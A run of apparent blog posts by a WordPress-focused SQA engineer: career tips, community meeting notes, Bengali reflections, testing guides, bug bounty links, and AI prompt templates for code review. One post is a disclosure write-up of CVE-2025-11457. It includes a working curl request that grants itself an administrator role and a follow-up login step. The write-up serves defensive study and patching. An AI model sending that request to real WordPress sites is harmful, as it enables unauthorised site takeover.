Many SQA engineers apply to dozens of jobs but still don’t get interview calls. In most cases, the problem isn’t the skill level—it’s the application strategy. Here are some simple, practical tips to help you improve your chances immediately.

1. Apply Early
Recruiters often check the first batch of applications and shortlist candidates quickly. If you apply late, your profile may never even be seen. Turn on job alerts so you can apply as soon as a new role is posted.

2. Read the Requirements Carefully
Many people apply blindly without checking whether they truly match the job description. Attention to detail matters. Spend a few minutes reading the entire circular—this is your first test as an SQA engineer.

3. Match Your Skills to the Job
If the JD mentions skills you don’t have and they aren’t reflected in your CV, your chances drop instantly.

Tip: Keep two CVs—a generic one and a customized one for each job posting.

4. Never Add Skills You Don’t Have
Recruiters will ask you questions directly from your CV. If you list something you can’t explain, it creates a bad impression and reduces your chances drastically.

5. Add Skill Levels Clearly
Instead of just listing tools or technologies, add a level such as Basic, Intermediate, or Advanced. This helps recruiters understand your strengths quickly.

6. Learn the Must-Have Skills
If the job highlights a “must-have” skill that you don’t know—learn it. Many key SQA tools can be learned quickly with online tutorials.

7. Improve Your Communication Skills
Technical skills matter, but communication skills often decide whether you get shortlisted. Good communication shows clarity, confidence, and professionalism.

A smart, targeted application always performs better than applying to random jobs. With the right strategy, SQA engineers can significantly increase their chances of getting interview calls and landing better opportunities.

CVE-2025-11457: Privilege Escalation in EasyCommerce Plugin

hello@hurayraiit.com (Abu Hurayra) — Mon, 01 Dec 2025 00:00:00 GMT

CVE-2025-11457 is a CVSS 9.8 (Critical) Unauthenticated Privilege Escalation vulnerability in the EasyCommerce – AI-Powered, Blazing-Fast & Beautiful WordPress Ecommerce Plugin for WordPress. The vulnerability affects all versions from 0.9.0-beta2 through 1.8.2. A single crafted HTTP request to the plugin's order creation endpoint lets an unauthenticated attacker create a WordPress admin account and take full control of the site.

Vulnerability Summary

Field	Value
Plugin Name	EasyCommerce – AI-Powered, Blazing-Fast & Beautiful WordPress Ecommerce Plugin
Plugin Slug	`easycommerce`
CVE ID	CVE-2025-11457
CVSS Score	9.8 (Critical)
CVSS Vector	`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
Vulnerability Type	Unauthenticated Privilege Escalation (Improper Privilege Management)
Affected Versions	<= 1.8.2
Patched Version	1.8.3
Published	November 10, 2025
Researcher	kr0d
Wordfence Advisory	Link

Description

The EasyCommerce – AI-Powered, Fast & Beautiful WordPress Ecommerce Plugin for WordPress is vulnerable to Privilege Escalation in versions 0.9.0-beta2 to 1.8.2. This is due to the /easycommerce/v1/orders REST API endpoint not properly restricting the ability for users to select roles during registration. This makes it possible for unauthenticated attackers to gain administrator-level access to a vulnerable site.

Technical Analysis

Vulnerable Code Path

1. REST API Endpoint Registration (app/Controllers/Common/API.php, line 2329–2371)

The POST /wp-json/easycommerce/v1/orders endpoint is registered with the is_user permission callback:

// app/Controllers/Common/API.php — register_order_endpoints()
$this->register_route(
    '/orders',
    array(
        'methods'    => WP_REST_Server::CREATABLE,
        'callback'   => array( new Order(), 'create' ),
        'args'       => array(
            'customer' => array(
                'description' => __( 'The customer ID or an array of customer data', 'easycommerce' ),
                'required'    => true,
            ),
            // ... other args, no validation on 'role' inside 'customer'
        ),
        'permission' => array( $this, 'is_user' ),
    )
);

2. Permission Callback Always Returns True (app/Traits/Auth.php, line 23–26)

// app/Traits/Auth.php
public function is_user( $request ) {
    return __return_true();
}

is_user() unconditionally returns true, which means any unauthenticated HTTP request passes the permission check. There is no nonce, no authentication token, and no IP restriction.

3. Order Creation Passes Raw Customer Data to User Creation (app/API/Order.php, line 71–75)

// app/API/Order.php — create()
} elseif ( is_array( $customer ) ) {
    $customer_obj = new Customer();
    $customer_obj->create( $customer );  // $customer comes directly from request params
    $customer_id = $customer_obj->get_id();
}

If the customer parameter is a JSON object and the email address does not exist yet, the plugin passes the full $customer array — unsanitized — directly to Customer::create(). This includes any role field the request contains.

4. Role Assigned Without Restriction (app/Abstracts/User.php, line 330)

// app/Abstracts/User.php — create()
$this->role = isset( $args['role'] ) ? $args['role'] : $this->role;

The create() method in the abstract User class directly assigns $args['role'] if it is present. No sanitization occurs before this call. So if an attacker sends "role": "administrator" in the request, their account is created with full administrator privileges.

5. User Saved with Attacker-Controlled Role (app/Abstracts/User.php, line 230–241)

// app/Abstracts/User.php — save()
$userdata = array(
    'user_email'   => $this->email,
    'user_login'   => $this->email,
    'display_name' => $this->name,
    'role'         => $this->role,   // attacker-controlled value
    'user_pass'    => $this->password,
);
$user_id = wp_insert_user( $userdata );

WordPress's wp_insert_user() accepts any valid role string. The new account is created with whatever role the attacker specified.

Root Cause

The vulnerability combines two flaws:

Missing authentication on the order creation endpoint: is_user() always returns true, allowing unauthenticated requests.
Missing role allowlist / sanitization: The User::create() method blindly trusts the caller-supplied role argument and passes it directly to wp_insert_user().

Why Controls Failed

The customer REST API parameter description states it accepts "The customer ID or an array of customer data (name and email)". The role key was never listed as a valid field in the argument definition, but it was never rejected either. WordPress REST API definitions do not enforce strict schemas. Undefined keys are ignored during validation, but they remain readable via get_param() in the handler. Because Order::create() passes the entire customer parameter directly to User::create(), no layer existed between the HTTP request and the role assignment.

Attack Impact

An unauthenticated attacker can:

Create a new WordPress user account with the administrator role
Immediately log in to the WordPress admin dashboard
Take full control of the site: install/remove plugins and themes, read all user data, modify content, exfiltrate credentials, or deploy malware

Proof of Concept

Disclaimer: This PoC is provided for educational and defensive security research purposes only.

Prerequisites

WordPress installation with the easycommerce plugin installed and activated
Plugin version <= 1.8.2

Step-by-Step Reproduction

Step 1: Identify the target site

Confirm the plugin is active and identify the WordPress REST API base URL. EasyCommerce's REST API namespace is easycommerce/v1.

TARGET="https://example.com"

Step 2: Craft the privilege escalation payload

Send a POST request to the order creation endpoint, supplying a customer object that includes "role": "administrator". The items field can be any string here — the user creation code runs before cart validation, so the account is created even if the cart check fails later.

curl -s -X POST "$TARGET/wp-json/easycommerce/v1/orders" \
  -H "Content-Type: application/json" \
  -d '{
    "items": "placeholder",
    "customer": {
      "email": "attacker@evil.com",
      "name": "Attacker",
      "first_name": "Evil",
      "last_name": "Attacker",
      "role": "administrator",
      "password": "Sup3rS3cr3t!"
    },
    "status": "pending"
  }'

Step 3: Confirm account creation

Even if the order fails — for example, due to an invalid cart hash — the plugin has already created the user account before reaching cart validation. Log in to the WordPress admin with the attacker's credentials:

curl -s -X POST "$TARGET/wp-login.php" \
  -d "log=attacker%40evil.com&pwd=Sup3rS3cr3t%21&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -c /tmp/cookies.txt \
  -b "wordpress_test_cookie=WP+Cookie+check" \
  -L

Expected Result

A new WordPress user attacker@evil.com is created with the administrator role. The attacker can now log into the WordPress admin panel and has full site control.

Verification

After the POST request, query the WordPress database or admin panel:

# Via WP-CLI (on the server)
wp user get attacker@evil.com --field=roles

# Expected output:
# administrator

Alternatively, navigate to $TARGET/wp-admin/users.php and confirm the new user appears with the Administrator role.

Patch Analysis

What Changed

The patch modifies only one file:

app/Abstracts/User.php — line 330

Fix Explanation

The patch removes the ability for callers to specify a role via the $args array in User::create(). Instead, the role is always kept as the object's pre-set default:

-		$this->role       = isset( $args['role'] ) ? $args['role'] : $this->role;
+		// Prevent user-supplied role for security reasons (CVE-2025-11457)
+		$this->role       = $this->role;

The Customer class sets protected $role = 'customer' by default. So the fix ensures all users created through the order flow receive the customer role, no matter what the request contains.

However, the fix is not complete. It addresses the unvalidated role assignment, but does not fix the is_user() permission callback, which still returns true unconditionally. The order creation endpoint remains open to unauthenticated users. This may allow other abuse such as registration spam or cart manipulation. Defenders should evaluate whether is_user() should require authentication in a future release.

Code Diff (Key Changes)

--- a/app/Abstracts/User.php
+++ b/app/Abstracts/User.php
@@ -327,7 +327,8 @@ abstract class User {
 		$this->name       = $args['name'];
 		$this->first_name = $args['first_name'];
 		$this->last_name  = $args['last_name'];
-		$this->role       = isset( $args['role'] ) ? $args['role'] : $this->role;
+		// Prevent user-supplied role for security reasons (CVE-2025-11457)
+		$this->role       = $this->role;
 		$this->password   = isset( $args['password'] ) ? $args['password'] : wp_generate_password();

Timeline

Date	Event
Unknown	Vulnerability discovered and reported by kr0d
November 10, 2025	Publicly disclosed on Wordfence Intelligence
November 13, 2025	Advisory last updated
November 10, 2025	Patched version 1.8.3 released

Remediation

Update the easycommerce plugin to version 1.8.3 or later immediately. If an immediate update is not possible, consider temporarily deactivating the plugin until updating is possible. After updating, audit your WordPress user list for any unexpected administrator accounts created before the patch was applied.

References

BAQC Volunteer Formation Meeting: Notes & Key Decisions

hello@hurayraiit.com (Abu Hurayra) — Sun, 30 Nov 2025 00:00:00 GMT

Date: Nov 30, 2025

Time: 09:35 PM

Volunteers: 19

MD Shobuj Miah

Shobuj vaiya started the meeting and shared the following information:

This is a non-profit community, and volunteers will not financially benefit from this.
We will arrange bi-weekly knowledge sharing sessions.
Shobuj vaiya receives a lot of requests from employers to find good SQA talent. With the growth of this community, the amount will only increase. So, we may plan to perform skill assessment and create a CV bank where employers can find the verified talent that they need.
We may organize testing-related competitions.
We may publish a magazine every year.
We may also plan to publish a book with help from the community members.
We can plan to implement crowdsourced community-based testing for the companies that need it.
Every community member should provide support and share posts to help grow the community.
Shobuj vaiya requested everyone to add BAQC to their LinkedIn profiles along with their assigned roles based on today's session.

Abdul Motaleb

Thanked everyone for building this community and expressed his appreciation.
He has 3+ years of experience working in a multinational company.
He wants to contribute with his manual testing skills.

Shakil Ahmed Sourov

He has 3+ years of experience in SQA.
He wants to learn good SQA processes and implement them in his company.
He wants to contribute with his Selenium Webdriver (Java) skills.

Abu Hurayra

He has 4.5 years of experience working in a WordPress-focused company.
He wants to contribute with his skills in security, automation, and overall testing regarding the WordPress ecosystem.

Afia Anjum

She is a fresher
She wants to help grow the community, build social media outreach, and develop branding.

Ahnaf Ahmed

He expressed how he felt the need for a community for SQA professionals.
He wants to see knowledge-sharing sessions related to SQA processes.
He wants mentorship from industry experts.
He wants to contribute with his knowledge of Cypress Automation (JS/TS).

Arifur Rahman Tuhin

He is a fresher
He wants to help build the community through social media outreach.

Badhon Parvej

He has 3 yoe in SQA.
He wants to see a bug bounty type platform for SQA and software testing.
He wants to contribute with his skills on Playwright Automation using Python and BDD, Load testing using JMeter.

Manjur Ahmed Chowdhury (Safin)

He is a fresher.
He is learning SDLC/STLC.
He wants to contribute with his manual testing skills and also help grow the community with social media presence.

Mohsin Farabi

He wants to contribute with his skills on JMeter for load testing, Postman and Selenium with Java.

Nahid Iqbal

He wants to see industry experts sharing their knowledge in sessions.
He is learning Playwright with POM.
He wants to help build the community with social media outreach.

Osama Bin Kalam

He thanked everyone for the initiative.
He has 2 yoe working as a manual tester.
He suggested that we should try to change the perception around SQA in our country.
He expressed his concerns that companies in our country try to force everyone to do both manual and automation testing and he wants to focus on a specific role.
He wants to contribute with his skills on manual testing and he wants to help grow social media outreach.

SM Raufuzzaman Ashik

He is still learning and growing.
He will contribute to grow the community.

Sabbir Ahmed

He teaches a couple of his friends about SQA in his free time, and when he learned about this community, he though why not contribute here so that more people can get benefited.
He suggested that we may share our learning progress in linkedin his hashtags of the comunity.
He wants to contribute with his skills on manual testing.

Sabina Sultana

She has taken a 3-month-long training on SQA.
She felt that the topics/concepts could be explained with small examples.
She wants to help teach others about what she learned about manual testing.
She is learning about JavaScript and Playwright.

Sohanur Rahman Sohan

He has 2 years of experience.
He expressed his gratitude for this community.
He wants to grow his skills.
He wants to learn about the SQA industry, interview processes, etc.

Subhendu

He is a fresher.
He wants to help build the community.

Tania Khatun

She has 2.5 years of experience working in a Dubai-based software company.
Unfortunately, the company went down recently.
She wants to learn and share knowledge.
She has an interest in the interview processes; she has attended a lot of interviews, and she collects interview questions from her peers.
She wants to help teach interview-related skills.

Tawsif Ahmed

He is a fresh graduate.
He shared that when juniors finish a course, they often fall into a loop and lose growth and motivation.
He hopes that the community will solve these issues.
He writes blog articles on manual testing.

Final Remarks

Emails will be sent to all interested contributors.
A separate WhatsApp group will be created for internal discussions.

সন্তানের মৃত্যু কীভাবে মেনে নেবো?

hello@hurayraiit.com (Abu Hurayra) — Sun, 30 Nov 2025 00:00:00 GMT

সন্তানের মৃত্যু অনেক কষ্টকর! মেনে নেয় খুব কষ্টকর হয়ে যায়। আল্লাহ এ বিষয়ে কী বলছেন? একজন মুসলিম হিসাবে আমরা সন্তানদের মৃত্যুকে কীভাবে মেনে নেবো?

What Is Sanity Testing? A Beginner’s Friendly Guide

hello@hurayraiit.com (Abu Hurayra) — Sun, 30 Nov 2025 00:00:00 GMT

Sanity testing is one of those QA terms that sounds more dramatic than it is—but it’s actually a simple, practical checkpoint every tester should understand. Think of it as a quick confidence boost for the software before the team dives into deeper testing.

At its core, sanity testing is a focused, narrow verification done after a bug fix or a small update. Your goal is to check whether the specific change behaves as expected and hasn’t broken anything essential around it. Unlike a full regression cycle, sanity testing is short, selective, and fast. You don’t check everything—you only check what matters right now.

Imagine a developer fixes a login issue. Before running complete regression tests, you perform a small set of targeted checks: Does the login work now? Does the reset password page still load? Are basic flows intact? If the answer is yes, the build is “sane”—safe enough for further testing.

Sanity testing usually happens after receiving a new build that includes minor changes, especially bug fixes. It acts as a safety net for the QA team. Rather than spending hours testing an unstable build, sanity testing helps you quickly decide whether the build is worth deeper investigation.

For beginners, the biggest challenge is knowing what to test and what to skip. A good rule is: test only what has changed and the functions directly connected to that change. If the developer fixed a checkout button, you don’t need to test the entire site—just the checkout flow and its immediate neighbors.

Sanity tests should be simple, predictable, and repeatable. You don’t write long test cases for them; instead, you rely on quick checks or short scripts. If the sanity test fails, the build goes back to the development team immediately. No need to proceed further.

Mastering sanity testing makes you faster and more efficient as a QA professional. You save your team’s time, avoid wasted effort, and ensure that deeper testing happens only when the product is stable enough.

BAQC SQA Community Meetup: Key Highlights & Takeaways

hello@hurayraiit.com (Abu Hurayra) — Fri, 28 Nov 2025 00:00:00 GMT

BAQC – Bangladesh Aspiring QA Community
SQA Community Meetup Summary (Nov 28, 2025 • Mirpur 12)
Attendees: 8

Alhamdulillah, the meetup wrapped up beautifully 🤲 The venue—chosen by Shobuj vaiya—was a calm, inspiring masjid that set the perfect tone. May Allah place barakah in everyone’s efforts.

The gathering began at 4 PM right after Asr. Shiblee vaiya opened the discussion by reflecting on a community he built in his youth—how it started, who joined, the challenges they faced, and why it couldn’t sustain. His reflections gave us a roadmap of pitfalls to avoid and principles to follow for building something lasting, by Allah’s mercy.

Shobuj vaiya then shared his journey into tech—his background, how he discovered Software Testing, and what fuels his passion for SQA. He talked about how easily we slip into comfort zones, stop learning, and gradually fall behind. His hope is that this community becomes a place that pushes all of us to grow, stay current, and support one another 🤝

Later, Shiblee vaiya offered valuable insights into his SQA hiring process—what he looks for, how he finds top talent, and the patterns he has observed over the years. Those who attended benefited deeply from his advice.

Shobuj vaiya continued the hiring discussion with stories from real experiences—how many people struggle because they lack a supportive network, and how a community could fill that gap. He emphasized the need for volunteers to take responsibility for:
• offering online help
• inviting members
• answering questions or directing them to experts
• collecting data on QA trends, tools, and technologies in Bangladesh
• identifying what freshers truly need to get hired
He encouraged contributors to step up as subject-matter experts to share focused knowledge for the benefit of all.

The conversation naturally shifted toward AI. With so many answers instantly available online, why do we need a community? Shiblee vaiya led this thought-provoking discussion, explaining that the real value lies in what AI can’t offer—human connection, mentorship, lived experience, emotional support, and accountability.

We took a short snack break and prayed Maghrib. After Maghrib, Shiblee vaiya had to leave, and the rest of us continued with more casual but meaningful conversations.

We talked about automation testing, learning paths, and effective knowledge sharing. Juniors asked questions, seniors shared guidance, and we discussed our next steps and upcoming plans. The meetup wrapped up right at 7 PM, and we parted with warm goodbyes 🌙

কমেন্ট করার আগে ভাবুন - রেজ বেইট কিনা

hello@hurayraiit.com (Abu Hurayra) — Thu, 27 Nov 2025 00:00:00 GMT

রেজ বেইট হলো এমন এক ধরনের প্ররোচনামূলক কন্টেন্ট, যেখানে ইচ্ছে করে এমন কিছু বলা বা দেখানো হয় যা মানুষের ভেতরে রাগ জাগিয়ে তোলে। উদ্দেশ্য সাধারণত খুবই সরল—মানুষ রেগে গিয়ে মন্তব্য করবে, শেয়ার করবে, বিতর্কে জড়াবে, আর অ্যালগরিদম সেই পোস্টকে আরও ছড়িয়ে দেবে। ফলে ভুল ধারণা, বিভ্রান্তি আর অস্বাস্থ্যকর আলোচনা আরও বাড়তে থাকে।

ধরুন কেউ এমন একটি পোস্ট দিল:
“৩০ বছরের চাকরি জীবন শেষে ১ কোটি টাকা হাতে পেতে চাইলে মাসে সঞ্চয় করুন মাত্র ৪,৬০৫ টাকা। প্রতি ৫ বছর পর পর সঞ্চয় বাড়বে ৩.৭১ লক্ষ, ৯.৬৯ লক্ষ, ১৯.৩১ লক্ষ, ৩৪.৮২ লক্ষ, ৫৯.৭৯ লক্ষ হয়ে ৩০ বছরে ১ কোটি টাকায় পৌঁছাবে। বার্ষিক ১০% কম্পাউন্ড রিটার্ন ধরে হিসাব করা হয়েছে। বিনিয়োগ করা যেতে পারে DPS বা SIP।”

এই ধরনের পোস্ট দেখলে ইসলামের অনুসারীরা স্বাভাবিকভাবেই ক্ষুব্ধ হতে পারেন, কারণ এখানে সুদভিত্তিক বিনিয়োগ ও রিটার্নের পরামর্শ দেওয়া হচ্ছে—যা ইসলামে হারাম। অথচ অনেক সময় এমন পোস্টগুলো ইচ্ছে করেই করা হয় বিতর্ক ছড়ানোর জন্য, যেন মানুষ রাগে প্রতিক্রিয়া জানায়।

এই ধরনের কন্টেন্টে মন্তব্য করা বা উত্তপ্ত আলোচনায় অংশ নেওয়া মানে সেই ফাঁদকেই আরও শক্তিশালী করা। নিজের স্নায়ুকে শান্ত রেখে এগিয়ে যাওয়া অনেক বেশি কার্যকর। রেজ বেইটের সবচেয়ে বড় পরাজয় হলো আপনার নীরবতা।

WPDeveloper SQA Job Circulars: Previous Openings Archive

hello@hurayraiit.com (Abu Hurayra) — Mon, 24 Nov 2025 00:00:00 GMT

This post contains a few job circulars related to SQA. These were used in the last few years by WPDeveloper to hire SQA resources. Are you trying to find your dream job in the SQA realm? I hope that these will help you. You can use these as a reference to update your skills and focus on what matters most.

Junior Software Test Engineer

Period: December, 2023

Link: https://wpdeveloper.com/all-jobs/junior-software-test-engineer/

Link: https://wpdeveloper.com/jobs/sqa-test-engineer-for-xcloud-hosting/

SQA & Test Engineer for xCloud Hosting

Period: March, 2024

Link: https://wpdeveloper.com/jobs/site-reliability-engineer/

Site Reliability Engineer

Period: April, 2024

Link: https://wpdeveloper.com/jobs/application-security-engineer/

Application Security Engineer

Period: June, 2024

Open Positions

All current open positions can be found here: https://careers.startise.com/

WordPress Bug Bounty: Best Resources for Security Researchers

hello@hurayraiit.com (Abu Hurayra) — Tue, 18 Nov 2025 00:00:00 GMT

WordPress has seen amazing growth in the bug bounty space in the last couple of years. Specially thanks to Patchstack and WordFence. A lot of newcomers are getting involved in this ecosystem. I decided to note down some important links that will hopefully guide the newcomers and help them find the resources faster.

Here are some links to resources related to bug bounty in the WordPress ecosystem:

Patchstack

Patchstack Bug Bounty Overview: https://patchstack.com/bug-bounty
Patchstack Bug Bounty Guidelines & Rules: https://patchstack.com/articles/bug-bounty-guidelines-rules/
Patchstack Vulnerability Database: https://patchstack.com/database/
All Time Patchstack Bug Bounty Leaderboard: https://patchstack.com/database/leaderboard/
Patchstack Discord Channel: https://discord.com/invite/V9AE9zczhv
Patchstack Academy (Free Learning Resource): https://patchstack.com/academy/welcome/
Recent Bug Bounty Articles in Patchstack Blog: https://patchstack.com/category/patchstack-bug-bounty/

Here are some facts about patchstack:

Patchstack only supports PayPal for bounty payouts. This link explains the process in detail.
They can do a direct bank transfer, if the bounty amount is at least $500. This is easier for people from Bangladesh.
Patchstack is super fast and responsive when it comes to triage.
If you have any issues or confusion, create a support ticket in their discord, or post a message in the channels there.
The leaderboard style competition is super fun and exciting.

WordFence

Wordfence Intelligence Bug Bounty Program Rules: https://www.wordfence.com/threat-intel/bug-bounty-program/
WordFence Bug Bounty Discord: https://discord.com/invite/awPVjTNTrn
WordFence Vulnerability Database: https://www.wordfence.com/threat-intel/vulnerabilities/
The WordPress Security Learning Center: https://www.wordfence.com/learn/

Others

WPCTF (Cool Challenges and Guidelines): https://wpctf.org/
Blog of Mat Rollings: https://sec.stealthcopter.com/

My Guidelines

If you are a beginner, start by learning about WordPress in depth.
Learn about the WordPress ecosystem.
Learn PHP. This is a must. You will be doing mostly whitebox testing and reviewing other peoples code. If you do not know PHP well, you can not do well here
Try to build your own plugin.
Learn about different types of plugins, like LMS, ecommerce, community etc.
Learn about Gutenberg FSE, Elementor, Bricks, etc and their philosophies.
When you have a solid understanding of WordPress, do this: Go to the WordFence Vulnerability Database. Then try to re-produce the reports.
Try to find similar bugs it other plugins.

Last Updated:

3 Powerful AI Prompts for WordPress SQA Engineers

hello@hurayraiit.com (Abu Hurayra) — Mon, 17 Nov 2025 00:00:00 GMT

What These Prompts Are

These are three specialized AI instruction sets designed for comprehensive software quality assurance of WordPress plugin updates. Each prompt guides an AI assistant to assume a specific expert role: an Application Security Engineer, a Software Quality Assurance Engineer, and a Senior Automation Test Engineer. The prompts instruct the AI to first understand the WordPress plugin's architecture and functionality, then use GitHub CLI to analyze code changes between two versions (branches or release tags), and finally provide detailed analysis from their respective expertise. The security prompt focuses on vulnerability detection with emphasis on sensitive data exposure, XSS, and access control issues. The SQA prompt generates manual test cases covering functional, regression, and integration testing. The automation prompt suggests end-to-end test scenarios for automated testing frameworks.

Why These Are Needed

Manual code review and test case generation for WordPress plugins is time-consuming and prone to human oversight, especially when dealing with complex updates spanning multiple files and features. These prompts systematically ensure that security vulnerabilities—particularly those affecting different WordPress user roles—are identified before deployment, preventing potential data breaches or exploitation. They also guarantee comprehensive test coverage by generating both manual validation steps and automation strategies that might otherwise be overlooked. By leveraging AI to perform initial analysis across security, functional testing, and automation perspectives, development teams can significantly reduce review time, improve code quality, catch critical issues early in the development cycle, and maintain consistent quality standards across releases—ultimately protecting both the plugin's users and the organization's reputation.

Prompt 01: Security Review

You are an experienced Application Security Engineer specializing in WordPress plugin security. I have a WordPress plugin repository open in VSCode with GitHub CLI (`gh` command) available.

**Your Task:**

1. **Project Analysis**: First, thoroughly analyze the entire WordPress plugin codebase to understand:
   - What the plugin does and its core functionality
   - All features and capabilities it provides
   - Architecture and how different components interact
   - WordPress hooks, filters, and integration points used
   - Database interactions and data handling
   - User-facing features and admin functionality

2. **Change Detection**: I will provide two branch names or release tags (format: `branch1/tag1` and `branch2/tag2`). Use GitHub CLI to:
   - Get diff/change summary: `gh api repos/:owner/:repo/compare/{base}...{head}`
   - Retrieve commit history and messages between the versions
   - Fetch associated PR descriptions if available
   - Examine the actual changed code files

3. **Security Review**: Conduct an in-depth security analysis of the changes with emphasis on:
   - **HIGH PRIORITY**: Sensitive information disclosure (API keys, credentials, PII, debug info)
   - **HIGH PRIORITY**: Cross-Site Scripting (XSS) vulnerabilities (reflected, stored, DOM-based)
   - **HIGH PRIORITY**: Broken Access Control (considering ALL WordPress user roles: Administrator, Editor, Author, Contributor, Subscriber, and custom roles)
   - SQL Injection vulnerabilities
   - Cross-Site Request Forgery (CSRF) - check for nonce usage
   - Authentication and authorization issues
   - Insecure direct object references
   - File upload vulnerabilities
   - Insecure deserialization
   - XML External Entity (XXE) attacks
   - Server-Side Request Forgery (SSRF)
   - Security misconfigurations
   - WordPress-specific security concerns:
     - Improper capability checks
     - Missing nonce verification
     - Insecure AJAX handlers
     - Direct database queries without sanitization
     - Improper use of `wp_enqueue_script/style`
     - Exposed REST API endpoints
     - Inadequate input validation and output escaping

4. **Output Format**: Provide your findings in simple markdown format:
   - Summary of changes overview
   - Security findings grouped by severity (Critical, High, Medium, Low, Info)
   - For each finding include:
     - Vulnerability type
     - Affected file(s) and line numbers
     - Description of the security issue
     - Potential impact (especially regarding different user roles)
     - Exploitation scenario
     - **Test cases to validate the vulnerability** (step-by-step)
     - Recommended remediation
   - Include code snippets only when necessary to illustrate the issue

**The branches/tags to compare are:** [I will provide these]

Begin by confirming you understand the repository structure, then proceed with the analysis.

Prompt 02: SQA Test Cases

You are an experienced Software Quality Assurance (SQA) Engineer specializing in WordPress plugin testing. I have a WordPress plugin repository open in VSCode with GitHub CLI (`gh` command) available.

**Your Task:**

1. **Project Analysis**: First, thoroughly analyze the entire WordPress plugin codebase to understand:
   - What the plugin does and its core functionality
   - All features and user workflows
   - WordPress integration points and dependencies
   - User roles and their interactions with the plugin

2. **Change Detection**: I will provide two branch names or release tags (format: `branch1/tag1` and `branch2/tag2`). Use GitHub CLI to:
   - Get diff/change summary: `gh api repos/:owner/:repo/compare/{base}...{head}`
   - Retrieve commit history and messages between the versions
   - Fetch associated PR descriptions if available
   - Examine the actual changed code files

3. **Test Case Generation**: Based on the changes, generate comprehensive test cases covering:
   - **Functional Tests**: New features and updated features
   - **Regression Tests**: Ensure existing functionality still works after changes
   - **Integration Tests**: Test interactions between changed components and existing components
   - **Boundary Tests**: Edge cases and limit testing
   - **Negative Tests**: Invalid inputs and error handling
   - **WordPress-Specific Tests**: Test across different user roles, WordPress versions, themes, and common plugin conflicts

4. **Output Format**: Provide test cases in simple markdown format using human-readable language:
   - Summary of changed features/areas
   - Test cases grouped by feature or change area
   - For each test case include:
     - **Test Case ID**: Simple numbering (TC-001, TC-002, etc.)
     - **Test Type**: (Functional/Regression/Integration/Boundary/Negative)
     - **Priority**: (High/Medium/Low)
     - **Preconditions**: What needs to be set up before testing
     - **Test Steps**: Clear, numbered steps in plain language
     - **Expected Results**: What should happen at each step
     - **User Role**: Which WordPress role should perform this test (if applicable)
     - **Dependencies**: Any plugins, themes, or settings required

**The branches/tags to compare are:** [I will provide these]

Begin by confirming you understand the repository structure, then proceed with generating the test cases.

Prompt 03: End to End Automation Test Strategy

You are a Senior Automation Test Engineer specializing in end-to-end (E2E) testing for WordPress plugins. I have a WordPress plugin repository open in VSCode with GitHub CLI (`gh` command) available.

**Your Task:**

1. **Project Analysis**: First, thoroughly analyze the entire WordPress plugin codebase to understand:
   - What the plugin does and its core functionality
   - User-facing features and workflows
   - Admin panel interactions
   - Frontend rendering and behaviors
   - AJAX interactions and dynamic content
   - Third-party integrations

2. **Change Detection**: I will provide two branch names or release tags (format: `branch1/tag1` and `branch2/tag2`). Use GitHub CLI to:
   - Get diff/change summary: `gh api repos/:owner/:repo/compare/{base}...{head}`
   - Retrieve commit history and messages between the versions
   - Fetch associated PR descriptions if available
   - Examine the actual changed code files

3. **E2E Test Strategy**: Analyze the changes and suggest E2E automated tests that cover:
   - Complete user journeys affected by the changes
   - Frontend functionality (user-facing features)
   - Backend/admin functionality (settings, configurations)
   - AJAX/API interactions
   - Form submissions and validations
   - Data persistence and retrieval
   - Cross-browser compatibility scenarios
   - Responsive design considerations
   - User role-based access scenarios
   - Integration with WordPress core features

4. **Output Format**: Provide E2E test suggestions in simple markdown format:
   - Summary of areas requiring E2E coverage
   - Suggested test automation tool/framework considerations (e.g., Playwright, Cypress, Puppeteer, wp-browser)
   - E2E test scenarios grouped by feature or user journey
   - For each E2E test include:
     - **Test Scenario ID**: Simple numbering (E2E-001, E2E-002, etc.)
     - **Test Name**: Descriptive name of the user journey
     - **Priority**: (Critical/High/Medium/Low)
     - **User Role**: Which WordPress user role is involved
     - **Preconditions**: Test environment setup requirements
     - **Test Flow**: Step-by-step user journey in plain language
     - **Assertions/Validations**: What should be verified at each step
     - **Test Data**: Any specific data needed for the test
     - **Expected Outcome**: End state after test completion
   - Include code snippets only if they help clarify complex interactions

**The branches/tags to compare are:** [I will provide these]

Begin by confirming you understand the repository structure, then proceed with suggesting the E2E test strategy.

3 AI Prompts Every SQA Tester Should Use in 2026

hello@hurayraiit.com (Abu Hurayra) — Wed, 12 Nov 2025 00:00:00 GMT

AI-Powered Code Change Analysis Prompts

These are three specialized AI prompts designed to analyze code changes between different versions of a SaaS or web application. Each prompt instructs an AI assistant to assume a specific technical role: an Application Security Engineer, an SQA Test Engineer, and a Senior Automation Test Engineer. The prompts work by having the AI first understand the project structure and functionality, then use GitHub CLI to identify changes between two provided branches or release tags, and finally deliver role-specific analysis and recommendations based on those changes.

Purpose and Objectives

The security-focused prompt aims to conduct comprehensive vulnerability assessments across all security domains including authentication, data protection, API security, and business logic flaws, providing detailed findings with severity ratings and validation test cases. The SQA prompt generates detailed functional, integration, and regression test cases with clear steps and expected results to ensure quality coverage of new and modified features. The automation prompt designs end-to-end test scenarios in natural language that cover complete user journeys and critical workflows, making them implementable in any testing framework.

Daily Benefits for SQA Engineers

These prompts dramatically accelerate an SQA engineer's workflow by automating the time-consuming process of analyzing code diffs and translating them into actionable test strategies. Instead of manually reviewing hundreds of changed files and trying to understand their implications, an SQA engineer can use these prompts to instantly receive organized test cases, identify regression risks, and understand security implications—tasks that normally take hours or days. This allows SQA teams to achieve faster release cycles, maintain higher test coverage, catch critical issues earlier in the development process, and spend more time on actual testing execution rather than test planning and analysis.

PROMPT 1: Security Review Engineer

You are an experienced Application Security Engineer conducting a comprehensive security review of code changes in a SaaS/web application project.

TASK OVERVIEW:
I will provide you with 2 branches/tags/releases to compare. Your job is to:
1. Analyze the project structure and understand what the application does and how it functions
2. Use GitHub CLI to identify changes between the provided references
3. Conduct an in-depth security review of the changes and their dependencies
4. Provide actionable findings and test cases

STEP-BY-STEP PROCESS:

Phase 1 - Project Understanding:
- Examine the project structure, configuration files, and documentation
- Identify the application type, architecture, and key components
- Understand the tech stack, frameworks, and dependencies
- Map out critical flows (authentication, data handling, API endpoints, etc.)

Phase 2 - Change Analysis:
- Use `gh` CLI commands to retrieve the diff between the two provided references (branches/tags/releases)
- Identify all modified files and their related dependencies
